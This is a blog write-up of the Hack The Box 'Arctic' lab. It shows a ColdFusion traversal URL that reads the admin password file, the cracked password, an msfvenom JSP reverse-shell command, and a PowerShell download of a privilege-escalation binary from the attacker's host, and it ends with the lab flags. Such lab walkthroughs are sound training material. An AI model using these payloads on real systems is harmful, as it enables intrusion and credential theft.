Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Artic Windows

Published on 22 Jan 2019
Tools and techniques used, LFI, hashkiller, jsp-shell

HTB Artic

Recon

Nmap scan report for 10.10.10.11
Host is up (0.048s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

  • We noticed that port 8500 is open.This port is used for Adobe ColdFusion.
  • We investigate further and we find a web app running.

  • Finally we we’re able to locate the admin page. This provides us with very important information like the adobe version running.
  • Some googlefu reveals that this version of Adobe is vulnerable to LFI.
  • PoC: 
     http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
  • So we exploit the admin page to obtain the password hash for the admin user

  • We crack the hash using a cracking website https://hashkiller.co.uk/Cracker and we our SHA1 password happyday

  • We login using the admin password

Exploitation

Once on the admin panel we choose scheduled tasks option from inside Debugging & logging for scheduling new task.

From the schedule task settings we can upload or .jsp shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f raw > shell.jsp

We set up apache to serve our payload.

Then we proceed to run the task so our payload can be executed

Finally, we set up an nc listerner and we catch our shell.

Privilege Escalation

We run windows suggeters and after a lot trials and errors I find a suitabl exploit

  • MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799)
python windows-exploit-suggester.py --database 2019-10-11-mssb.xls --systeminfo
systeminfo.txt

After some google I find a compiled version of the exploit, we dowload the file and run it

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.14/
Chimichurri.exe', 'Chimichurri.exe')"

FLAGS

USER "02650d3a69a70780c302e146a6cb96f3"
ROOT "ce65ceee66b2b5ebaff07e50508ffb90"

Related posts